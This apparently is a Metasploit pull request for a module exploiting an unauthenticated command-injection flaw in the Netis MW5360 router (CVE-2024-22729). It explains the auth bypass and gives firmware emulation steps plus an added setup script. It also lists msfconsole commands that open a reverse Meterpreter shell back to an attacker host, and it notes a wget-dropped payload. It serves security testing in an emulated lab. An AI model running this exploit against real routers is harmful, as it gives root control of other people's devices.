Netis MW5360 unauthenticated RCE [CVE-2024-22729] #19188
Netis router MW5360 has a command injection vulnerability via the `password` parameter on the login page. The vulnerability stems from improper handling of the `password` parameter within the router's web interface. The router's login page authorization can be bypassed by simply deleting the authorization header, leading to the vulnerability. All router firmware versions up to V1.0.1.3442 are vulnerable. Attackers can inject a command in the `password` parameter, encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker to take full control of the router as user `root`.

The following Netis network products are vulnerable:
This module has been tested via FirmAE running on Kali Linux 2024.5 at the following emulated targets:
Installation steps to emulate the router firmware with FirmAE

1. Install `FirmAE` on your Linux distribution using the installation instructions provided here. `binwalk` might need to be able to handle a sasquatch filesystem, which requires a few additional installation and compilation steps that you can find here. Please do not forget to run this after your `FirmAE` installation, otherwise you will not be able to extract the firmware.
2. The firmware image `MW5360-1.0.1.3442.bin` is used for the demonstration.
3. Run `./init.sh` to initialize and start the Postgres database.
4. Run `./run.sh -d Netis /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin`.
5. `ping` the emulated router and run `nmap` to check the ports.

You are now ready to test the module using the emulated router hardware on IP address 192.168.1.1.
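The emulation steps above, wrapped in a script with the sanity checks a tester wants before pointing the module at the emulated router. This is an added example, not code from the PR or from the FirmAE project. It assumes FirmAE is checked out in /root/FirmAE, that the firmware image is stored under /root/FirmAE/firmwares as in the `run.sh` command above, and that `run.sh -d` (FirmAE's debug mode) is interactive, so the script runs `init.sh`, prints the `run.sh` command to start in a second terminal, waits for 192.168.1.1 to answer ping, and then scans it with `nmap`. The boot timeout of 300 seconds is an assumed default.

```shell
#!/bin/sh
# Added example, not part of the PR or the FirmAE project: automates the
# emulation steps listed above (init.sh, run.sh -d, ping, nmap) with the
# checks a tester wants before pointing the module at the emulated router.
# Assumptions not stated on the page: FirmAE is checked out in /root/FirmAE,
# the firmware image is stored under /root/FirmAE/firmwares, and
# `run.sh -d` is interactive, so it is started from a second terminal.
set -eu

FIRMAE_DIR="${FIRMAE_DIR:-/root/FirmAE}"                 # assumed location
FIRMWARE="${FIRMWARE:-Netis_MW5360-1.0.1.3442.bin}"      # image named on the page
ROUTER_IP="${ROUTER_IP:-192.168.1.1}"                    # IP named on the page
BOOT_TIMEOUT="${BOOT_TIMEOUT:-300}"                      # seconds to wait (assumed)

# Build the FirmAE command from the page; -d is FirmAE's debug mode.
emu_run_cmd() {
  printf './run.sh -d Netis %s\n' "$1"
}

ping_once() {
  ping -c 1 -W 1 "$1"
}

# Poll a host with a probe command until it answers or the timeout (in
# seconds) expires. Returns 0 when the host answered, 1 otherwise. The probe
# defaults to a single ping; tests can inject another command.
wait_for_host() {
  host=$1
  timeout=$2
  probe=${3:-ping_once}
  elapsed=0
  while [ "$elapsed" -lt "$timeout" ]; do
    if "$probe" "$host" >/dev/null 2>&1; then
      return 0
    fi
    sleep 1
    elapsed=$((elapsed + 1))
  done
  return 1
}

main() {
  fw="$FIRMAE_DIR/firmwares/$FIRMWARE"
  cd "$FIRMAE_DIR"
  for f in init.sh run.sh "$fw"; do
    [ -e "$f" ] || { echo "missing: $f (is FirmAE installed and the firmware downloaded?)" >&2; exit 1; }
  done
  ./init.sh                                  # initialize and start the Postgres database
  echo "Start the emulation in a second terminal:"
  echo "  cd $FIRMAE_DIR && $(emu_run_cmd "$fw")"
  echo "Waiting up to ${BOOT_TIMEOUT}s for $ROUTER_IP to answer ping ..."
  wait_for_host "$ROUTER_IP" "$BOOT_TIMEOUT" || { echo "$ROUTER_IP did not come up" >&2; exit 1; }
  nmap -sV "$ROUTER_IP"                      # confirm the web interface is reachable
}

# Only run the procedure when explicitly asked, e.g. `sh emulate.sh go`.
case "${1:-}" in
  go) main ;;
esac
```

Run it as `sh emulate.sh go` from any directory; it changes into the FirmAE checkout itself. If the router never answers within the timeout, check the second terminal for FirmAE extraction errors (the sasquatch step above is the usual cause) before suspecting the network setup.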
Verification
msfconsole
use exploit/linux/http/netis_unauth_rce_cve_2024_22729
set rhosts <ip-target>
set lhost <ip-attacker>
set target <0=Linux Dropper>
exploit
You should get a Meterpreter session.

Scenarios
Netis MW5360 Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
Limitations

Staged payloads might core dump on the target, so use stageless payloads when using the Linux Dropper target.

Another limitation is that the router has a very limited command set that can be leveraged, so the only option is to use the `wget` command to drop an executable on the target to get a session. Chained command lines using `;` do not work, so each command needs to be executed in a separate request with a delay of 30 seconds or more to avoid session locking (see the `CMD_DELAY` option).

Last but not least, be mindful that the admin router password gets overwritten by the exploit, resulting in a clear indicator of compromise.